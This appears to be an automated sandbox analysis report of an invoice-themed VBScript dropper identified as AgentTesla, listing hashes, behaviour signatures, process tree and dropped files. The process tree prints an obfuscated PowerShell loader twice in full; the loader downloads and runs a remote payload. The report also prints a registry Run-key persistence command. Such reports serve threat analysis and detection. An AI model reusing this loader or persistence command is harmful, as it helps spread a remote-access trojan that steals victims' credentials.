Analysis

  • max time kernel
    141s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    03-06-2024 09:18

General

  • Target
    overdue_invoice.vbs
  • Size
    15KB
  • MD5
    7078829e255df55f25a8bcaa9bdaffb4
  • SHA1
    1bcacd12305661a2dedecb4eb6f8ad57ae5d672e
  • SHA256
    d16ea5d6d40c9020b99032eaefab9b62f3c63bae12d24103a6b10ac5a2dcd34c
  • SHA512
    4d56cc648febb1c0dceb44e41415cb30a9e975997f5d3fa67b97e2a039d6068f383e285daeb39b50eb0b18bd1a1c5c102544f2670e54e3109cff74d6268e1495
  • SSDEEP
    192:ulJUFFdUTxfDs+rHw7FEFggnliEWHxg40HG5Q6MkouP0L3gwJSi3qMFP6WPS6vMy:ulCHkxNrHwhEjiIvkJ8LJRY4Er8saQa

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in Visual Basic.

  • Blocklisted process makes network request 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\overdue_invoice.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2952
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. 
ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH 
SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa 
Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2156
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"
        3⤵
          PID:2636
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Stigereols147 = 1;Function Acarpelous($refried){$Oisen=$refried.Length-$Stigereols147;$Kredsret='Substring';For( $Simulationerne=5;$Simulationerne -lt $Oisen;$Simulationerne+=6){$Kassestrimlen+=$refried.$Kredsret.Invoke( $Simulationerne, $Stigereols147);}$Kassestrimlen;}function Sulfide($Honning){ . ($Rorgngeres204) ($Honning);}$Illumination=Acarpelous 'Je,miMSpor oInkohzGivenipalsilBerlil ParaaGaslo/Thers5,uman.Provi0 Mumm mid,(Geoc,W Jul iBit,enYtterdOdiseoh.gstwStukkschill ,rodNpenisT Cowl Exhib1Dknin0Udpla.super0Toldk;Sul o nostrWCreopiUd rin Bum 6Br ds4 Eras;Peric Ah,hox Le,c6laxat4Vider;relat Zaca.r nedkvBrod,:Trira1S.atu2d,str1S bin.Br.ak0Desa ) Filu UnknoG Fea,eFluthcNakkek MissoRespo/Struc2Halfp0S,ill1 farv0parag0 Hand1 Aq,i0Nond.1esu.i IndivFE mesiOverdrIndiseBlit fHovedo MappxAngel/Dick 1Toure2Brode1Toena.Moist0Gaffe ';$feststemning=Acarpelous 'To,arUSnefosFiraaePlimsrEpico-GenneA ,hargBagsieGu vmnAnimatSubst ';$Prominences=Acarpelous 'Ja kahRe,akt Decot AncopUncomsElaeo:Umenn/F,kke/E.istwMaanew HemmwRatch.Monopideglun .utonPseu oCemenv IndgaRarettMirabiWagewv Klase Firmb MauvuClou,iMultil,ercud Insti F kans kkygAr,ansslangospilplunperuN.gattCrocoiHartloSer,inInco.sJumbo. 
ForviReplynExtra/,hokowudvi pKlu.d-,lushcSka,eoLegion Tript polyeSnobbnEkspetFo.mn/SolbluDe.umpStrubl UnhooBistaa SulpdPureesUrina/perl,gM.wchrOpfosaRegisvanisoikvanttFrokoyDefo,_UnbehfSmd,doTheavr Im.amR.evosan va/steerhAnten/KlapjdNymph/.vrdebIndst/Us gegSpr,n/VassiUUkonvdBaguepUnverlRaspbaSkrignKabletLyv knAdveniRigelnAfsvegHvir,eRets,nGravm.Deod,u Trol3Ptole2Byg,e ';$Romanbladsstil199=Acarpelous 'Non.n>Reall ';$Rorgngeres204=Acarpelous 'Elefai Te.teVegetxEn ar ';$Pruderies71='Federalistisk';$Springdanses = Acarpelous 'Hjerte Ba.dcTnkemhStberoMonon ,amme%Recoma V,jlpTranepG lledBefo,aDeplatbrneeamoist%N fig\ConfeS,ariekBeflerWhalemHast.eBesnatforsk.AttenKGavltlBe.iei Nonp Ticto&Unrel&Kotwa Ejac,eFhovecpr enh ransoBdell Skrnetaaret ';Sulfide (Acarpelous 'Ques $ Chipg PudelSlf,noFlussbha noaUntralEtymo:SkakmHExtraoIldfumRektoouafklg ,unaeJordnnTelegeUge aoUnagiuaftalsGyl en Ligne a tesDis,isCoxale Undes cada= niv(AdkomcUnc,ymUnde dSumpt Toyma/Filibc,anca Dueho$ElinoSFuldsp Ace,r lutbiUdrednTngergForwad Dr.laNonaunRe.ols ,eceeImmunsNed.j)Skotj ');Sulfide (Acarpelous ' Bain$Re.ragT.verlB.nego Vissb Mee aTr,inlBetje:Cuckonbrys,rNrmesiTervan revegPolycs BlokbEr.iar CalaeChandvBrudge O ernUdfaneDesmo=raptu$Br ndP lfodr ,impoEn otm dditi igurnLejdeeFeodanOospocforudeSpytssGrips.Trivas AreapFamillKodesiAfdmptunrec(Hunde$Z.mopR gelaoB.figmHeadeaIncepnAtelobAmmunlHundeaT illdIsdansTorc,sMannatVoussiWo,sll Bide1Parge9Scrie9 Yami)tyran ');$Prominences=$nringsbrevene[0];$Nondeformity= (Acarpelous 'T.ktr$Triecg,ondolBo,yboTransbBackgaNegerlSmok,:.burgRMinimeOvermpOp.aviBank.qstanduMilieiVejr nCommogBefol=OvertN BetreStudiwThree-KildeO.utpubAksiaj KkkeeGennecNephrtVilje SuboSUdpeny B.ttsSkrmttLat,eeflivvmb,ufr.FolkeN Fin,eStuditChefk.Bair WMarchePre.rbGeoboCVaccilBoutfiunemoeGlasknTeglst');$Nondeformity+=$Homogeneousnesses[1];Sulfide ($Nondeformity);Sulfide (Acarpelous ' psti$RegioRTroskePissap TingiAn.icqGeninuTam yiHykl nIllingFoxed.GalloH 
SlipeArmitahuslgdFlageeIsidorIambisMod.r[sandh$NomasfChance Kin.sTremotgametsCot.ltJet ieslingm Naegn PurpiSocianoplseg Stjk] Ek.t=Con,i$ReassIunparl,ngaglFolkeuPluvim In.biKrigsnTumpeaFaitetGhettiTaffeoH slinNonth ');$Betnkning=Acarpelous 'Neg e$Text RKitleeUnderp OrthiAgtsoqAn.gau.trikiRhyminMaintgIn.er.MhedeDInkasoC kerwSeks,n Ildkl CircoNonpraUbetadArbejFStiftiB.egelRetinePi,op(Sdest$Lag aPMaturrMellaoKighumUnderiahousnKapitePondanAc.ckc,ogeneGrappsFigh,,Ritua$ArmounT ylle CorrwF,eddiPrangeOlfac) Velk ';$newie=$Homogeneousnesses[0];Sulfide (Acarpelous 'Halvp$AllicgScl,rlSki,fotric,bElitaaSlav,lPheny:Ree aEpreclflilj.tCeveneAarsorErhvem TimeoKonomd OuthnI.olaiWitchnPeriggCardieHianar asianCausteC rot=Necr (MurenTEksameMonotsSt rltOutbo- NonsPS,ruma tilstMacr.hSemid Fina $RecodnRetsveMet.lwCottoiObligePetro)Betaf ');while (!$Eftermodningerne) {Sulfide (Acarpelous 'Regis$Unsusg hairlRhibioSleekbps udaMystilNek,b:ErhveBPhenoe zuccnJoshicImpr hUndec=Gt.fd$Ski.nt.utbirTr riuOps,meRish. ') ;Sulfide $Betnkning;Sulfide (Acarpelous 'geogrSAut,rtExtraaRadiorKitaktMison-,reotS aurlS.xofeSi,gleDrearp mo,o S,ill4Antro ');Sulfide (Acarpelous 'skval$.ebragTildelFusaro ErhvbOmbytaHypotlForbe:Coen.EForsgf IkratHrfreeSensirApropm Rakeo Un,xd precnBrkkei efeanSkrifgPinnaeOpinarHetern PneueSulfo=Gulsp( Os.iTGene,eF rstsw.isttFunkt-ProrhPIndkoaPseudt G,ldhAfroh Sk at$StaminViljeeUnderwRearriTr.wle oldf)Anlbs ') ;Sulfide (Acarpelous ' Olie$BloksgUnderlBairnoHelleb tjgeaDroemlDetri: JudaScalviuYderlbSpiraaAlarmlTa,eaa HandrModery sy,h=Carib$S,lvugUddeblBornaoWe nib Arbea tv dlKalkb:Cell.AbravokJolletBrydeaId.emnBefritS jsim J meoSpecidChiefeUtjenl.ovedlBeworeEnergrAmpel+G,uli+Laa e% Tok.$MembrnBgersrteoreiLi innTachygSynsvssprogb H,terRaceteRensev IndseGtemanMageseDi,si.BirnacAbalaoGantzuSkattn M.totmi.ro ') ;$Prominences=$nringsbrevene[$Subalary];}$Grdris=340707;$Filtraters=28431;Sulfide (Acarpelous 'unsup$ ProggFedtelAfkogoEmpirb K keaDaktyl Gom :E,dodJHuldsoRegnsuNowsorVid on Risoa 
Na ulDial.iDebatsselefeKalder KrysiLuftfn Colog AchisMor esOptagyHornssAlliktAlfoneStickmDesti Spri,=T.adi SkilGSkraae Parat Wien- El,cCtrophoSheddnBrigitResineApokanOplyst Melo Ogal,$ Pup,nShitte Tromw,lidfiBj.ine ooti ');Sulfide (Acarpelous ' Stig$CognogKasseluntraoLandbb MentaDeduclMokop: DoriTChocko SumexA,resiAs,aypM scrhUnd roFrailbunforiVest.aHuckl Vivia=Skram Subso[NazieSBitcoysurclsEm.rgtFol.eeReshomPromi.P senC Sky.oNeonrn berevCrable Talnr AnaptAllon]Syphi:Phyll:sy teF ,jakrTrituoscaphmRostrBSprjtaAttensP romePatri6Bogme4 ZoonSPa.pytSupe,rSiksai Chann ShacgLo,ns( larl$TephrJRrt.goBriaruLikinrF.rdenRegeaaReci lAwakeiPreshssu eretndesr AfstiLowpan VaregBordbs Arc,sUhomoyDellss,econtmeline,jtidmmoney)stift ');Sulfide (Acarpelous 'Rets,$ olangMcguilgrou oAgrosbObseraFantolRigsa:Renhog PsycacountfMaa ef Au oe B,sslPitheeClassnUltrasHvorb Kist=.aget Sarce[A.bedSfilasytyktasU dattPeniteFall,mTilra. SgeoT PrieeAvoidxRetrat P ro. Pl.nE.demanSmaabcRgbomoTe rndMotiviKvartn BraggKerit]Outbr: Urte: BestACouncSSecu.CTern.I OldbI,nsta.,onraGAg ree De atRe,urS elintEi.htrRetski,nternCanvagmaale(Ly.ns$BlomsTAphyroSufflx.ecidiHarlepAnti hMignioPol.rbFortri ullaaloomf)Bran, ');Sulfide (Acarpelous ',ndfr$Fluatgre,lplNy edoMetembIlliqa VilllReolp: AgteNRundho GennnforeptKojikoUnvicrBrenntGun,tuNazifoGeisauFourdsChum.=Non.x$Indigg Un,raEjectf VuggfR.tsheOli olOv rpeFolken Grapsf,imr.,iskosFor.yuMark b lugsSlidst Hjerr.utleiCovennTunnegF okk(Wille$OplgnG SyngrAggredEru,erDropliVita s Vaab, ekst$ sociF ThymiZach,lDrejet BedorOptrya ,nartUtopieExuberQuatesMigsh) Anti ');Sulfide $Nontortuous;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1964
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Skrmet.Kli && echo t"
            4⤵
              PID:2424
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:2112
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1800
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "tonsillectomic" /t REG_EXPAND_SZ /d "%Rundsavsbladene% -w 1 $sartor=(Get-ItemProperty -Path 'HKCU:\Codebtors\').Typeregningens;%Rundsavsbladene% ($sartor)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:2408

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6J4520554E2X6SS5OMAQ.temp
        Filesize
        7KB
        MD5
        a827ff99cbccfab8cc86b1c1fecc9021
        SHA1
        911690184d451687ed5fa08601a9b93387ac97b5
        SHA256
        262b2a2744c9e11590a9659239470480c3f690ade183679cb9914a9e4cc88594
        SHA512
        9e89423da63c455fe9d5ed715f8dd917826a849f372b09546473593efe117b7719aeb5fab180d0ed0ec1ee4495ef2717e460b21c7a453d0273c2bcd4b6e0179f
      • C:\Users\Admin\AppData\Roaming\Skrmet.Kli
        Filesize
        480KB
        MD5
        9916e5a5f7afe8c1f861f93999a875f3
        SHA1
        8d1f119fcb5942cd8e71f3bb1fc527c2a74549cc
        SHA256
        97cebd696b9e5587ba0a101e2cdabf9bf01ab268d354408fdc349085760579df
        SHA512
        30b0c3b929218288998b7578672872d84e5fd810543b77de153033b491b0dd9472ccaa711b448fcbd9ccc9a67888e3439aeea5d1c13b2860f1f480a325a24edc
      • memory/1964-17-0x0000000006680000-0x000000000A2DC000-memory.dmp
        Filesize
        60.4MB
      • memory/2112-34-0x0000000000AC0000-0x0000000000B00000-memory.dmp
        Filesize
        256KB
      • memory/2112-32-0x0000000000AC0000-0x0000000001B22000-memory.dmp
        Filesize
        16.4MB
      • memory/2156-10-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp
        Filesize
        9.6MB
      • memory/2156-4-0x000007FEF5F7E000-0x000007FEF5F7F000-memory.dmp
        Filesize
        4KB
      • memory/2156-9-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp
        Filesize
        9.6MB
      • memory/2156-7-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp
        Filesize
        9.6MB
      • memory/2156-16-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp
        Filesize
        9.6MB
      • memory/2156-8-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp
        Filesize
        9.6MB
      • memory/2156-18-0x000007FEF5F7E000-0x000007FEF5F7F000-memory.dmp
        Filesize
        4KB
      • memory/2156-6-0x00000000027A0000-0x00000000027A8000-memory.dmp
        Filesize
        32KB
      • memory/2156-33-0x000007FEF5CC0000-0x000007FEF665D000-memory.dmp
        Filesize
        9.6MB
      • memory/2156-5-0x000000001B5F0000-0x000000001B8D2000-memory.dmp
        Filesize
        2.9MB